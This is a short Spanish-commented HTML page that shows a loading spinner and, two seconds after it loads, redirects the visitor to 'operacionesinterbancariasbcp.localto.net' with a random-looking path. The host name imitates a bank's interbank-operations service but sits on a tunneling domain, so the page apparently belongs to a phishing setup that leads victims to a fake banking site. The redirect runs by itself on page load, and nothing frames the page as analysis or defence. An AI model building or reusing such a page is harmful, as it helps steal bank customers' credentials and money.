<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Redireccionando...</title>
  <style>
    body {
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
      margin: 0;
      background-color: #f0f8ff;
      font-family: Arial, sans-serif;
    }

    .spinner {
      width: 50px;
      height: 50px;
      border: 6px solid #f3f3f3; /* Color gris claro */
      border-top: 6px solid #007bff; /* Color azul */
      border-radius: 50%;
      animation: spin 2s linear infinite;
    }

    @keyframes spin {
      0% {
        transform: rotate(0deg);
      }
      100% {
        transform: rotate(360deg);
      }
    }
  </style>
</head>
<body>
  <div class="spinner"></div>

  <script>
    // Redirige después de 2 segundos (2000 milisegundos)
    setTimeout(() => {
      window.location.href = "https://operacionesinterbancariasbcp.localto.net/jda0s8jd230jras0idfja0sdasdbasa"; // Cambia a la URL de destino
    }, 2000);
  </script>
</body>
</html>
